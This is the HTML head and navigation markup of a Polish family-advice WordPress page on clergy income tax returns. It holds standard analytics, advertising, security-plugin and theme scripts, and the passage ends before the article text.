<!DOCTYPE html><!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]--><!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]--><!--[if gt IE 8]><!--><html lang="pl-PL" prefix="og: http://ogp.me/ns#" class=" td-md-is-chrome"><!--<![endif]--><head>
    <title>PITY osób duchownych - erodzina.com</title>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="pingback" href="http://www.erodzina.com/xmlrpc.php">
    <meta property="og:image" content="http://www.erodzina.com/wp-content/uploads/2016/10/pitax4.jpg">
<!-- This site is optimized with the Yoast SEO plugin v9.5 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://www.erodzina.com/pity-osob-duchownych/">
<meta property="og:locale" content="pl_PL">
<meta property="og:type" content="article">
<meta property="og:title" content="PITY osób duchownych - erodzina.com">
<meta property="og:description" content="Księża oraz osoby duchowne prawnie uznanych innych wyznań opłacają podatek dochodowy głównie w formie ryczałtu od przychodów osiąganych z opłat w związku z pełnionymi funkcjami duszpasterskimi. Podatek ryczałtowy a pity Ponieważ osoby duchowne płacą podatek w formie ryczałtu, to są zwolnione ze składania rocznych pitów o wysokości swojego dochodu z przychodu ze źródła objętego ryczałtem. …">
<meta property="og:url" content="http://www.erodzina.com/pity-osob-duchownych/">
<meta property="og:site_name" content="erodzina.com">
<meta property="article:section" content="Książki i magazyny">
<meta property="article:published_time" content="2016-10-11T16:45:16+00:00">
<meta property="article:modified_time" content="2017-06-23T12:50:11+00:00">
<meta property="og:updated_time" content="2017-06-23T12:50:11+00:00">
<meta property="og:image" content="http://www.erodzina.com/wp-content/uploads/2016/10/pitax4.jpg">
<meta property="og:image:width" content="1000">
<meta property="og:image:height" content="750">
<meta name="twitter:card" content="summary">
<meta name="twitter:description" content="Księża oraz osoby duchowne prawnie uznanych innych wyznań opłacają podatek dochodowy głównie w formie ryczałtu od przychodów osiąganych z opłat w związku z pełnionymi funkcjami duszpasterskimi. Podatek ryczałtowy a pity Ponieważ osoby duchowne płacą podatek w formie ryczałtu, to są zwolnione ze składania rocznych pitów o wysokości swojego dochodu z przychodu ze źródła objętego ryczałtem. […]">
<meta name="twitter:title" content="PITY osób duchownych - erodzina.com">
<meta name="twitter:image" content="http://www.erodzina.com/wp-content/uploads/2016/10/pitax4.jpg">
<!-- / Yoast SEO plugin. -->

<link rel="dns-prefetch" href="//fonts.googleapis.com">
<link rel="dns-prefetch" href="//s.w.org">
<link rel="alternate" type="application/rss+xml" title="erodzina.com » Kanał z wpisami" href="http://www.erodzina.com/feed/">
<link rel="alternate" type="application/rss+xml" title="erodzina.com » Kanał z komentarzami" href="http://www.erodzina.com/comments/feed/">
<link rel="alternate" type="application/rss+xml" title="erodzina.com » PITY osób duchownych Kanał z komentarzami" href="http://www.erodzina.com/pity-osob-duchownych/feed/">
		<script src="https://www.googletagservices.com/activeview/js/current/osd.js?cb=%2Fr20100101"></script><script type="text/javascript" async="" src="https://www.google-analytics.com/analytics.js"></script><script src="https://pagead2.googlesyndication.com/pub-config/r20160913/ca-pub-3024020928900291.js"></script><script id="twitter-wjs" src="//platform.twitter.com/widgets.js"></script><script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.erodzina.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=08d9606e383c22a2a96301a016ee3d3c"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script><script src="http://www.erodzina.com/wp-includes/js/wp-emoji-release.min.js?ver=08d9606e383c22a2a96301a016ee3d3c" type="text/javascript" defer=""></script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel="stylesheet" id="wp-block-library-css" href="http://www.erodzina.com/wp-includes/css/dist/block-library/style.min.css?ver=08d9606e383c22a2a96301a016ee3d3c" type="text/css" media="all">
<link rel="stylesheet" id="lptw-style-css" href="http://www.erodzina.com/wp-content/plugins/advanced-recent-posts/lptw-recent-posts.css?ver=08d9606e383c22a2a96301a016ee3d3c" type="text/css" media="all">
<link rel="stylesheet" id="cookie-notice-front-css" href="http://www.erodzina.com/wp-content/plugins/cookie-notice/css/front.min.css?ver=08d9606e383c22a2a96301a016ee3d3c" type="text/css" media="all">
<link rel="stylesheet" id="responsive-lightbox-swipebox-css" href="http://www.erodzina.com/wp-content/plugins/responsive-lightbox/assets/swipebox/css/swipebox.min.css?ver=2.1.0" type="text/css" media="all">
<link rel="stylesheet" id="google-fonts-style-css" href="http://fonts.googleapis.com/css?family=Work+Sans%3A400%2C500%2C600%2C700%7CSource+Sans+Pro%3A400%2C400italic%2C600%2C600italic%2C700%7CDroid+Serif%3A400%2C700&amp;ver=2.1" type="text/css" media="all">
<link rel="stylesheet" id="td-theme-css" href="http://www.erodzina.com/wp-content/themes/ionMag/style.css?ver=2.1" type="text/css" media="all">
<script type="text/javascript" src="http://www.erodzina.com/wp-includes/js/jquery/jquery.js?ver=1.12.4"></script>
<script type="text/javascript" src="http://www.erodzina.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1"></script>
<script type="text/javascript">
/* <![CDATA[ */
var cnArgs = {"ajaxurl":"http:\/\/www.erodzina.com\/wp-admin\/admin-ajax.php","hideEffect":"fade","onScroll":"no","onScrollOffset":"100","cookieName":"cookie_notice_accepted","cookieValue":"true","cookieTime":"2592000","cookiePath":"\/","cookieDomain":"","redirection":"","cache":"","refuse":"no","revoke_cookies":"0","revoke_cookies_opt":"automatic","secure":"0"};
/* ]]> */
</script>
<script type="text/javascript" src="http://www.erodzina.com/wp-content/plugins/cookie-notice/js/front.min.js?ver=1.2.46"></script>
<script type="text/javascript" src="http://www.erodzina.com/wp-content/plugins/responsive-lightbox/assets/swipebox/js/jquery.swipebox.min.js?ver=2.1.0"></script>
<script type="text/javascript" src="http://www.erodzina.com/wp-content/plugins/responsive-lightbox/assets/infinitescroll/infinite-scroll.pkgd.min.js?ver=08d9606e383c22a2a96301a016ee3d3c"></script>
<script type="text/javascript">
/* <![CDATA[ */
var rlArgs = {"script":"swipebox","selector":"lightbox","customEvents":"","activeGalleries":"0","animation":"1","hideCloseButtonOnMobile":"0","removeBarsOnMobile":"0","hideBars":"1","hideBarsDelay":"5000","videoMaxWidth":"1080","useSVG":"1","loopAtEnd":"0","woocommerce_gallery":"0","ajaxurl":"http:\/\/www.erodzina.com\/wp-admin\/admin-ajax.php","nonce":"90da8a9d95"};
/* ]]> */
</script>
<script type="text/javascript" src="http://www.erodzina.com/wp-content/plugins/responsive-lightbox/js/front.js?ver=2.1.0"></script>
<link rel="https://api.w.org/" href="http://www.erodzina.com/wp-json/">
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.erodzina.com/xmlrpc.php?rsd">
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.erodzina.com/wp-includes/wlwmanifest.xml"> 
<link rel="shortlink" href="http://www.erodzina.com/?p=3083">
<link rel="alternate" type="application/json+oembed" href="http://www.erodzina.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.erodzina.com%2Fpity-osob-duchownych%2F">
<link rel="alternate" type="text/xml+oembed" href="http://www.erodzina.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.erodzina.com%2Fpity-osob-duchownych%2F&amp;format=xml">
<script type="text/javascript">
(function(url){
	if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }
	var addEvent = function(evt, handler) {
		if (window.addEventListener) {
			document.addEventListener(evt, handler, false);
		} else if (window.attachEvent) {
			document.attachEvent('on' + evt, handler);
		}
	};
	var removeEvent = function(evt, handler) {
		if (window.removeEventListener) {
			document.removeEventListener(evt, handler, false);
		} else if (window.detachEvent) {
			document.detachEvent('on' + evt, handler);
		}
	};
	var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');
	var logHuman = function() {
		if (window.wfLogHumanRan) { return; }
		window.wfLogHumanRan = true;
		var wfscr = document.createElement('script');
		wfscr.type = 'text/javascript';
		wfscr.async = true;
		wfscr.src = url + '&r=' + Math.random();
		(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
		for (var i = 0; i < evts.length; i++) {
			removeEvent(evts[i], logHuman);
		}
	};
	for (var i = 0; i < evts.length; i++) {
		addEvent(evts[i], logHuman);
	}
})('//www.erodzina.com/?wordfence_lh=1&hid=6CD75165AE1DA20A39D17CFDC1FEE36F');
</script>	<style id="tdw-css-placeholder"></style>			<script>
				window.tdwGlobal = {"adminUrl":"http:\/\/www.erodzina.com\/wp-admin\/","wpRestNonce":"8d458eb031","wpRestUrl":"http:\/\/www.erodzina.com\/wp-json\/","permalinkStructure":"\/%postname%\/"};
			</script>
			<!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    
<!-- JS generated by theme -->

<script>
    
    

	    var tdBlocksArray = []; //here we store all the items for the current page

	    //td_block class - each ajax block uses a object of this class for requests
	    function tdBlock() {
		    this.id = '';
		    this.block_type = 1; //block type id (1-234 etc)
		    this.atts = '';
		    this.td_column_number = '';
		    this.td_current_page = 1; //
		    this.post_count = 0; //from wp
		    this.found_posts = 0; //from wp
		    this.max_num_pages = 0; //from wp
		    this.td_filter_value = ''; //current live filter value
		    this.is_ajax_running = false;
		    this.td_user_action = ''; // load more or infinite loader (used by the animation)
		    this.header_color = '';
		    this.ajax_pagination_infinite_stop = ''; //show load more at page x
	    }


        // td_js_generator - mini detector
        (function(){
            var htmlTag = document.getElementsByTagName("html")[0];

	        if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) {
                htmlTag.className += ' ie10';
            }

            if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) {
                htmlTag.className += ' ie11';
            }

	        if ( navigator.userAgent.indexOf("Edge") > -1 ) {
                htmlTag.className += ' ieEdge';
            }

            if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) {
                htmlTag.className += ' td-md-is-ios';
            }

            var user_agent = navigator.userAgent.toLowerCase();
            if ( user_agent.indexOf("android") > -1 ) {
                htmlTag.className += ' td-md-is-android';
            }

            if ( -1 !== navigator.userAgent.indexOf('Mac OS X')  ) {
                htmlTag.className += ' td-md-is-os-x';
            }

            if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) {
               htmlTag.className += ' td-md-is-chrome';
            }

            if ( -1 !== navigator.userAgent.indexOf('Firefox') ) {
                htmlTag.className += ' td-md-is-firefox';
            }

            if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) {
                htmlTag.className += ' td-md-is-safari';
            }

            if( -1 !== navigator.userAgent.indexOf('IEMobile') ){
                htmlTag.className += ' td-md-is-iemobile';
            }

        })();




        var tdLocalCache = {};

        ( function () {
            "use strict";

            tdLocalCache = {
                data: {},
                remove: function (resource_id) {
                    delete tdLocalCache.data[resource_id];
                },
                exist: function (resource_id) {
                    return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null;
                },
                get: function (resource_id) {
                    return tdLocalCache.data[resource_id];
                },
                set: function (resource_id, cachedData) {
                    tdLocalCache.remove(resource_id);
                    tdLocalCache.data[resource_id] = cachedData;
                }
            };
        })();

    
    
var td_viewport_interval_list=[{"limitBottom":767,"sidebarWidth":228},{"limitBottom":1018,"sidebarWidth":300},{"limitBottom":1140,"sidebarWidth":300}];
var td_animation_stack_effect="type0";
var tds_animation_stack=true;
var td_animation_stack_specific_selectors=".entry-thumb, img";
var td_animation_stack_general_selectors=".td-animation-stack img, .td-animation-stack .entry-thumb, .post img";
var td_ajax_url="http:\/\/www.erodzina.com\/wp-admin\/admin-ajax.php?td_theme_name=ionMag&v=2.1";
var td_get_template_directory_uri="http:\/\/www.erodzina.com\/wp-content\/themes\/ionMag";
var tds_snap_menu="snap";
var tds_logo_on_sticky="";
var tds_header_style="2";
var td_please_wait="Prosz\u0119 czeka\u0107 ...";
var td_email_user_pass_incorrect="U\u017cytkownik lub has\u0142o niepoprawne!";
var td_email_user_incorrect="E-mail lub nazwa u\u017cytkownika jest niepoprawna!";
var td_email_incorrect="E-mail niepoprawny!";
var tds_more_articles_on_post_enable="show";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top=0;
var tds_theme_color_site_wide="#4db2ec";
var tds_smart_sidebar="enabled";
var tdThemeName="ionMag";
var td_magnific_popup_translation_tPrev="Poprzedni (Strza\u0142ka w lewo)";
var td_magnific_popup_translation_tNext="Nast\u0119pny (Strza\u0142ka w prawo)";
var td_magnific_popup_translation_tCounter="%curr% z %total%";
var td_magnific_popup_translation_ajax_tError="Zawarto\u015b\u0107 z %url% nie mo\u017ce by\u0107 za\u0142adowana.";
var td_magnific_popup_translation_image_tError="Obraz #%curr% nie mo\u017ce by\u0107 za\u0142adowany.";
var tdDateNamesI18n={"month_names":["Stycze\u0144","Luty","Marzec","Kwiecie\u0144","Maj","Czerwiec","Lipiec","Sierpie\u0144","Wrzesie\u0144","Pa\u017adziernik","Listopad","Grudzie\u0144"],"month_names_short":["Sty","Lut","Mar","Kwi","Maj","Cze","Lip","Sie","Wrz","Pa\u017a","Lis","Gru"],"day_names":["niedziela","poniedzia\u0142ek","wtorek","\u015broda","czwartek","pi\u0105tek","sobota"],"day_names_short":["nie","pon","wt","\u015br","czw","pt","sob"]};
var tds_video_playlists=false;
var td_ad_background_click_link="";
var td_ad_background_click_target="";
</script>


<!-- Header style compiled by theme -->

<style>
    
@media (max-width: 767px) {
        .td-header-wrap .td-header-menu-wrap {
            background-color: #ffffff !important;
        }
    }

    
    @media (max-width: 767px) {
        #td-top-mobile-toggle i,
        .td-header-menu-search i {
            color: #000000 !important;
        }
    }
</style>

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async="" src="https://www.googletagmanager.com/gtag/js?id=UA-3556722-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-3556722-1');
</script><script type="application/ld+json">
                        {
                            "@context": "http://schema.org",
                            "@type": "BreadcrumbList",
                            "itemListElement": [{
                            "@type": "ListItem",
                            "position": 1,
                                "item": {
                                "@type": "WebSite",
                                "@id": "http://www.erodzina.com/",
                                "name": "Strona główna"                                               
                            }
                        },{
                            "@type": "ListItem",
                            "position": 2,
                                "item": {
                                "@type": "WebPage",
                                "@id": "http://www.erodzina.com/kategoria/rozrywka-i-hobby/",
                                "name": "Rozrywka i Hobby"
                            }
                        },{
                            "@type": "ListItem",
                            "position": 3,
                                "item": {
                                "@type": "WebPage",
                                "@id": "http://www.erodzina.com/kategoria/rozrywka-i-hobby/ksiazki-i-magazyny/",
                                "name": "Książki i magazyny"                                
                            }
                        },{
                            "@type": "ListItem",
                            "position": 4,
                                "item": {
                                "@type": "WebPage",
                                "@id": "http://www.erodzina.com/pity-osob-duchownych/",
                                "name": "PITY osób duchownych"                                
                            }
                        }    ]
                        }
                       </script><link rel="preload" href="https://adservice.google.com.ph/adsid/integrator.js?domain=www.erodzina.com"><script type="text/javascript" src="https://adservice.google.com.ph/adsid/integrator.js?domain=www.erodzina.com"></script><link rel="preload" href="https://adservice.google.com/adsid/integrator.js?domain=www.erodzina.com"><script type="text/javascript" src="https://adservice.google.com/adsid/integrator.js?domain=www.erodzina.com"></script><link rel="preload" href="http://pagead2.googlesyndication.com/pagead/js/r20190204/r20190131/show_ads_impl.js"><script charset="utf-8" src="https://platform.twitter.com/js/button.e96bb6acc0f8bda511c0c46a84ee18e4.js"></script></head>

<body class="post-template-default single single-post postid-3083 single-format-standard pity-osob-duchownych global-block-template-1 td-animation-stack-type0 td-full-layout cookies-not-set td-js-loaded" itemscope="itemscope" itemtype="http://schema.org/WebPage">

<div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>

<div class="td-menu-background"></div>
<div id="td-mobile-nav" style="min-height: 769px;">
    <div class="td-mobile-container">
        <!-- mobile menu top section -->
        <div class="td-menu-socials-wrap">
            <!-- socials -->
            <div class="td-menu-socials">
                
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/erodzinacom-255288531163995/" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>            </div>
            <!-- close button -->
            <div class="td-mobile-close">
                <a href="#"><i class="td-icon-close-mobile"></i></a>
            </div>
        </div>

        <!-- login section -->
        
        <!-- menu section -->
        <div class="td-mobile-content">
            <div class="menu-main-container"><ul id="menu-main" class="td-mobile-main-menu"><li id="menu-item-5108" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-first menu-item-has-children menu-item-5108 td_mobile_elem_with_submenu_0"><a href="http://www.erodzina.com/kategoria/zycie-i-rodzina/" class="td-link-element-after">Rodzina<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-0" class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zycie-i-rodzina/alkoholizm/">Alkoholizm</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zycie-i-rodzina/dziecko-porady/">Dziecko porady</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zycie-i-rodzina/malzenstwo/">Małżeństwo</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zycie-i-rodzina/porady-prawne/">Porady prawne</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zycie-i-rodzina/wychowanie-dziecka/">Wychowanie dziecka</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zycie-i-rodzina/wydarzenia/">Wydarzenia</a></li>
</ul>
</li>
<li id="menu-item-5107" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-5107 td_mobile_elem_with_submenu_1"><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/" class="td-link-element-after">Zdrowie<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/antykoncepcja/">Antykoncepcja</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/choroby-dzieciece/">Choroby dziecięce</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/cukrzyca/">Cukrzyca</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/domowa-apteczka/">Domowa apteczka</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/medycyna-alternatywna/">Medycyna alternatywna</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/rak/">Rak</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/rzuc-palenie/">Rzuć palenie</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/wady-sluchu/">Wady słuchu</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/zdrowe-nogi/">Zdrowe nogi</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/zdrowie-dziecka/">Zdrowie dziecka</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/zdrowie-kobiety/">Zdrowie kobiety</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/zdrowie-mezczyzny/">Zdrowie mężczyzny</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/zdrowie-i-opieka/zdrowie-rodziny/">Zdrowie rodziny</a></li>
</ul>
</li>
<li id="menu-item-5100" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-5100 td_mobile_elem_with_submenu_2"><a href="http://www.erodzina.com/kategoria/ciaza-i-porod/" class="td-link-element-after">Ciąża<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/ciaza-i-porod/ciaza/">Ciąża</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/ciaza-i-porod/karmienie/">Karmienie</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/ciaza-i-porod/niemowleta/">Niemowlęta</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/ciaza-i-porod/nieplodnosc/">Niepłodność</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/ciaza-i-porod/nim-zajdziesz-w-ciaze/">Nim zajdziesz w ciąże</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/ciaza-i-porod/porod/">Poród</a></li>
</ul>
</li>
<li id="menu-item-5102" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-5102 td_mobile_elem_with_submenu_3"><a href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/" class="td-link-element-after">Dom<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/budujemy-i-remontujemy/">Budujemy i Remontujemy</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/dekoracje/">Dekoracje</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/kuchnia-i-lazienka/">Kuchnia i Łazienka</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/ogrod-i-taras/">Ogród i Taras</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/pokoj-dzieciecy/">Pokój Dziecięcy</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/salon-i-sypialnia/">Salon i Sypialnia</a></li>
</ul>
</li>
<li id="menu-item-5101" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-5101 td_mobile_elem_with_submenu_4"><a href="http://www.erodzina.com/kategoria/diety-i-fitness/" class="td-link-element-after">Fitness<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/diety-i-fitness/diety/">Diety</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/diety-i-fitness/kobieta-i-sport/">Kobieta i sport</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/diety-i-fitness/odchudzanie/">Odchudzanie</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/diety-i-fitness/zdrowe-odzywianie/">Zdrowe odżywianie</a></li>
</ul>
</li>
<li id="menu-item-5103" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-5103 td_mobile_elem_with_submenu_5"><a href="http://www.erodzina.com/kategoria/porady-i-kuchnia/" class="td-link-element-after">Porady<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/porady-i-kuchnia/kuchnia-malucha/">Kuchnia malucha</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/porady-i-kuchnia/porady-domowe/">Porady domowe</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/porady-i-kuchnia/porady-kawosza/">Porady kawosza</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/porady-i-kuchnia/przepisy-kulinarne/">Przepisy kulinarne</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/porady-i-kuchnia/twoj-dom-i-ogrod/">Twój dom i ogród</a></li>
</ul>
</li>
<li id="menu-item-5104" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children menu-item-5104 td_mobile_elem_with_submenu_6"><a href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/" class="td-link-element-after">Rozrywka<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/kacik-dziecka/">Kącik dziecka</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/komputer-i-internet/">Komputer i Internet</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/konkursy/">Konkursy</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/ksiazki-i-magazyny/">Książki i magazyny</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/twoja-rozrywka/">Twoja rozrywka</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/wakacje-i-urlop/">Wakacje i urlop</a></li>
</ul>
</li>
<li id="menu-item-5106" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-5106 td_mobile_elem_with_submenu_7"><a href="http://www.erodzina.com/kategoria/uroda-i-styl/" class="td-link-element-after">Uroda<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/uroda-i-styl/chirurgia-plastyczna/">Chirurgia plastyczna</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/uroda-i-styl/dlonie-i-stopy/">Dłonie i stopy</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/uroda-i-styl/kosmetyki/">Kosmetyki</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/uroda-i-styl/moda-i-uroda/">Moda i uroda</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/uroda-i-styl/piekny-usmiech/">Piękny uśmiech</a></li>
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/uroda-i-styl/skora-i-wlosy/">Skóra i włosy</a></li>
</ul>
</li>
<li id="menu-item-5105" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-5105 td_mobile_elem_with_submenu_8"><a href="http://www.erodzina.com/kategoria/slub-i-wesele/" class="td-link-element-after">Ślub<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li class="menu-item-0"><a href="http://www.erodzina.com/kategoria/slub-i-wesele/para-mloda/">Para Młoda</a></li>
</ul>
</li>
</ul></div>        </div>
    </div>

    <!-- register/login section -->
    </div><div class="td-search-background"></div>
<div class="td-search-wrap-mob">
	<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
		<form method="get" class="td-search-form" action="http://www.erodzina.com/">
			<!-- close button -->
			<div class="td-search-close">
				<a href="#"><i class="td-icon-close-mobile"></i></a>
			</div>
			<div role="search" class="td-search-input">
				<span>Wyszukiwanie</span>
				<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off">
			</div>
		</form>
		<div id="td-aj-search-mob"></div>
	</div>
</div>

<div id="td-outer-wrap" class="td-theme-wrap">
    
<!--
Header style 2
-->

<div class="td-header-wrap td-header-style-2">
    <div class="td-header-bg td-container-wrap "></div>
    <div class="td-header-top-menu td-container-wrap ">
        <div class="td-container td-header-row">
            <!-- LOGIN MODAL -->
        </div>
    </div>

    <div class="td-header-logo-wrap td-container-wrap ">
